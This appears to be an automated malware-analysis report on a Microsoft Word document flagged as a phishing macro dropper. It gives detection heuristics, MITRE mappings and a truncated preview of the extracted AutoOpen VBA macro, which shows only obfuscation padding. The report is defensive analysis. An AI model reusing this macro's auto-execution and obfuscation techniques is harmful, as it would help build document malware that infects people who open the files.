MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a VBA macro that is automatically executed via the AutoOpen function. Heuristics indicate the macro uses GetObject, a common technique for executing code. The macro's obfuscated nature and the presence of a VBA macro file suggest it is designed to download and execute a secondary payload, aligning with a spearphishing attachment attack vector.
Heuristics 7
-
ClamAV: Doc.Malware.Generic-6667835-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6667835-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14529 bytes |
SHA-256: 82f74d5fb3d8c5c52a81f518c86f3d9a79c61f0094f0d854d04b3ec4e9f82910 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
ryjeqovkgi = "varusorijyv" & Val("3718 varusorijyv")
pecoguiw = "xaedp" & Val("25367 xaedp")
vuxcikigerej = IIf(48382 > 48382, "zolyaaseautyf", "zolyaaseautyfzolyaaseautyf")
aolokavarytwyg = 23757 - 10
While aolokavarytwyg < 23757
'zaiicezzaiicez
aolokavarytwyg = aolokavarytwyg + 1
Wend
aonybugubuz = Array("guegiias", "xzolopivu", "iuxeiylezecyg", "nufevy", "kjuihogucac")
duhoguvysloi = "hezas" & Val("13785 hezas")
fyiybiuraaiq = LBound(Array("zbuhiaezicyan", "qaaeqersapibi", "runwsytumudy", "iiiykxyidi"))
ketytuceuri = CDate(21870)
tykavojat = 59720 - 10
While tykavojat < 59720
'jacitixadjacitixad
tykavojat = tykavojat + 1
Wend
saiufago = CDate(31870)
On Error Resume Next
qedecadiduhy = InStr("qosgafofuzty", "qosgafofuzty")
qefemicepala = 13810 - 10
While qefemicepala < 13810
'siakuwosiakuwo
qefemicepala = qefemicepala + 1
Wend
zyhioez = Array("keph", "ritcawyfyneiag", "gejeaofaqimen", "goneqikydemakov", "qilisf")
fmitteyiaxi = "zafys"
pzebefboi = CDate(92701)
wizydwagifim = InStr("jvetyvi", "jvetyvi")
sekitajonubip = "goaponiruxi"
fubelurj = "dutacyfavomeqow" & Val("95969 dutacyfavomeqow")
pitupipkferop = CDate(1386)
neiecevaci = InStr("ziwebudosyg", "ziwebudosyg")
'kubagty45934 kubagty
bpudarymul = "mikadypimeh"
koaabharc = IIf(30160 > 30160, "xojyvuhomies", "xojyvuhomiesxojyvuhomies")
laqvyvihaxas = LBound(Array("iiwivakcle", "iiryx", "gyteeqexu", "muvajyg", "gijobokimva"))
arofiz = "xxux" & Val("71198 xxux")
iowynaiof = "xuwqexyvunu" & Val("9365 xuwqexyvunu")
ninoranovohepc = "ruunuqyzuak"
fesog = "megil" & Val("18026 megil")
dogpykaz = "covunetuwys"
fawypixectok = IIf(39038 > 39038, "aoguzeiernisiw", "aoguzeiernisiwaoguzeiernisiw")
folodahuiqe = 70156 - 10
vepig = InStr("waqiwia", "waqiwia")
'tujdapy22596 tujdapy
While folodahuiqe < 70156
'anussywypuanussywypu
riwicas = CDate(3926)
folodahuiqe = folodahuiqe + 1
Wend
kxutyfageliqok = CDate(87667)
vufezajriz = "bahuresytc"
guzaz = Array("puqudlawycpap", "cyzizusz", "bubijo")
nykovic = Array("xificux", "fosenifyzusewar", "kuzaa")
imyrikhe = IIf(51635 > 51635, "qiterof", "qiterofqiterof")
xukaa = "gekewatuqa"
suqojyd = InStr("heiace", "heiace")
vuxujolyseluru = 64266 - 10
While vuxujolyseluru < 64266
'supebaosupebao
vuxujolyseluru = vuxujolyseluru + 1
Wend
pofigigeboi = LBound(Array("kuauwagybu", "tabulohyzesa", "doxawaxufara", "taaijaaahicicu"))
'hocemadi29477 hocemadi
rypavipgoh = IIf(71156 > 71156, "fynimomeb", "fynimomebfynimomeb")
iihojesuhypobu = CDate(73137)
genunoaipusom = 48303 - 10
While genunoaipusom < 48303
'cukmuhozisucukmuhozisu
genunoaipusom = genunoaipusom + 1
Wend
rapewawedeziv = ""
jcot = 12413 - 10
While jcot < 12413
'iaqoqedysewaoiaqoqedysewao
jcot = jcot + 1
Wend
gewyloiuk = "cybjzuvalitiw" & Val("88774 cybjzuvalitiw")
wybyl = LBound(Array("aesuwemacyxonuq", "wiwokumag", "aahomyvoso", "damylx", "dnyiefu", "milogotygixy"))
'uobid56982 uobid
'nyiired46086 nyiired
yzulotyieb = IIf(73887 > 73887, "ayiideduiiw", "ayiideduiiwayiideduiiw")
wiaanabyk = Array("iijipkiuxef", "xijb", "senoviwya", "hybep", "vabigeav")
gpuz = "xiluk"
fobjodxugehuj = "peziie" & Val("13209 peziie")
pozydyb = 64287 - 10
While pozydyb < 64287
'uvoninaaimmasuvoninaaimmas
pozydyb = pozydyb + 1
Wend
lujtyhyxy = InStr("wykipivota", "wykipivota")
riafutaayiuius = InStr("kausykadula", "kausykadula")
rtei = Array("saitili", "widdahanahuh", "hihufo", "viginonyfogak")
zedb = "eiony"
fiufema = "aocumiajotai" & Val("3871 aocumiajotai")
fmaba = "gehapiguhasa"
titiv = CDate(93335)
penifyf = InStr("sinixsufixilew", "sinixsufixilew")
'peacatyiu58162 peacatyiu
aepep = 19325 - 10
While aepep < 19325
'nabuiotnabuiot
aepep = aepep + 1
Wend
hyzigumeiupa = IIf(17880 >
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.